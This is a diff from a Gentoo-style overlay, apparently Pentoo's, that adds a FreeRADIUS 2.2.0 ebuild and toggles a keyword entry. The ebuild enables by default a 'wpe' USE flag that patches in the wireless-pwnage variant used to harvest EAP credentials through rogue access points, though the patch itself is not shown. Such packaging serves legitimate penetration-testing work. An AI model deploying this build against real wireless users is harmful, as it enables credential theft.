newinitd "${FILESDIR}/radius.init-r2" radiusd
newconfd "${FILESDIR}/radius.conf" radiusd
cd "${ED}"/etc/raddb/certs
emake -j1 all
#cd raddb
#emake R=${ED} install
}

186
net-dialup/freeradius/freeradius-2.2.0-r1.ebuild Normal file
View file

@ -0,0 +1,186 @@
# Copyright 1999-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/freeradius-2.2.0.ebuild,v 1.4 2012/10/03 10:29:49 ago Exp $
EAPI=4
PATCHSET=4
inherit eutils pam autotools user python
MY_P="${PN}-server-${PV}"
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="ftp://ftp.freeradius.org/pub/radius/${MY_P}.tar.gz
ftp://ftp.freeradius.org/pub/radius/old/${MY_P}.tar.gz
http://dev.gentoo.org/~flameeyes/${PN}/${P}-patches-${PATCHSET}.tar.xz"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="amd64 ~ppc ~ppc64 ~sparc x86"
LICENSE="GPL-2"
SLOT="0"
IUSE="bindist debug firebird kerberos ldap mysql
pam postgres ssl pcap readline ruby sqlite python odbc iodbc
oracle +wpe"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
sys-devel/libtool
dev-lang/perl
sys-libs/gdbm
python? ( >=dev-lang/python-2.4 )
readline? ( sys-libs/readline )
pcap? ( net-libs/libpcap )
mysql? ( virtual/mysql )
postgres? ( dev-db/postgresql-server )
firebird? ( dev-db/firebird )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
ruby? ( dev-lang/ruby:1.8 )
sqlite? ( dev-db/sqlite:3 )
odbc? ( dev-db/unixODBC )
iodbc? ( dev-db/libiodbc )
oracle? ( dev-db/oracle-instantclient-basic )"
DEPEND="${RDEPEND}"
REQUIRED_USE="bindist? ( !firebird )"
S="${WORKDIR}/${MY_P}"
pkg_setup() {
enewgroup radius
enewuser radius -1 -1 /var/log/radius radius
}
src_prepare() {
epatch "${WORKDIR}"/patches/*.patch
if use wpe; then
epatch "${FILESDIR}/${PN}-2.1.12-wpe.patch"
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# most of the configuration options do not appear as ./configure
# switches. Instead it identifies the directories that are available
# and run through them. These might check for the presence of
# various libraries, in which case they are not built. To avoid
# automagic dependencies, we just remove all the modules that we're
# not interested in using.
use ssl || rm -r src/modules/rlm_eap/types/rlm_eap_{tls,ttls,peap}
use ldap || rm -r src/modules/rlm_ldap
use kerberos || rm -r src/modules/rlm_krb5
use pam || rm -r src/modules/rlm_pam
use python || rm -r src/modules/rlm_python
use ruby || rm -r src/modules/rlm_ruby
# these are all things we don't have in portage/I don't want to deal
# with myself
rm -r src/modules/rlm_eap/types/rlm_eap_tnc # requires TNCS library
rm -r src/modules/rlm_eap/types/rlm_eap_ikev2 # requires libeap-ikev2
rm -r src/modules/rlm_opendirectory # requires some membership.h
rm -r src/modules/rlm_redis{,who} # requires redis
rm -r src/modules/rlm_sql/drivers/rlm_sql_{db2,freetds,sybase}
# sql drivers that are not part of experimental are loaded from a
# file, so we have to remove them from the file itself when we
# remove them.
usesqldriver() {
local flag=$1
local driver=rlm_sql_${2:-${flag}}
if ! use ${flag}; then
rm -r src/modules/rlm_sql/drivers/${driver} || die
sed -i -e /${driver}/d src/modules/rlm_sql/stable || die
fi
}
usesqldriver mysql
usesqldriver postgres postgresql
usesqldriver firebird
usesqldriver iodbc
usesqldriver odbc unixodbc
usesqldriver oracle
usesqldriver sqlite
# remove bundled ltdl to avoid conflicts
rm -r libltdl
eautoreconf
}
src_configure() {
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf="${myconf} --enable-heimdal-krb5"
fi
use readline || export ac_cv_lib_readline=no
use pcap || export ac_cv_lib_pcap_pcap_open_live=no
# do not try to enable static with static-libs; upstream is a
# massacre of libtool best practices so you also have to make sure
# to --enable-shared explicitly.
econf \
--enable-shared --disable-static \
--disable-ltdl-install \
--with-system-libtool \
--with-system-libltdl \
--with-ascend-binary \
--with-udpfromto \
--with-dhcp \
--with-iodbc-include-dir=/usr/include/iodbc \
--with-experimental-modules \
--with-docdir=/usr/share/doc/${PF} \
--with-logdir=/var/log/radius \
$(use_enable debug developer) \
$(use_with ldap edir) \
$(use_with ssl openssl)
}
src_install() {
dodir /etc
diropts -m0750 -o root -g radius
dodir /etc/raddb
diropts -m0750 -o radius -g radius
dodir /var/log/radius
keepdir /var/log/radius/radacct
diropts
emake R="${D}" install
chown -R root:radius "${D}"/etc/raddb
sed -i -e '/run_dir =/s:=.*:=/var/run/radiusd:' \
"${D}"/etc/raddb/radiusd.conf
pamd_mimic_system radiusd auth account password session
dodoc CREDITS
rm "${D}/usr/sbin/rc.radiusd"
newinitd "${FILESDIR}/radius.init-r3" radiusd
newconfd "${FILESDIR}/radius.conf-r3" radiusd
}
pkg_config() {
if use ssl; then
cd "${ROOT}"/etc/raddb/certs
./bootstrap
fi
}
pkg_postinst() {
elog "Users are no longer read from /etc/raddb/radiusd.conf. Please"
elog "configure them in /etc/conf.d/radius instead."
elog "Also make sure that if you change the pidfile in /etc/raddb/radiusd.conf"
elog "you change the pidfile definition in /etc/conf.d/radius as well."
if use ssl; then
ewarn "You have to run \`emerge --config =${CATEGORY}/${PF}\` to be able"
ewarn "to start the radiusd service."
fi
}

2
profiles/pentoo/base/package.accept_keywords/net-dialup
View file

@ -1 +1 @@
~net-dialup/freeradius-2.2.0
#~net-dialup/freeradius-2.2.0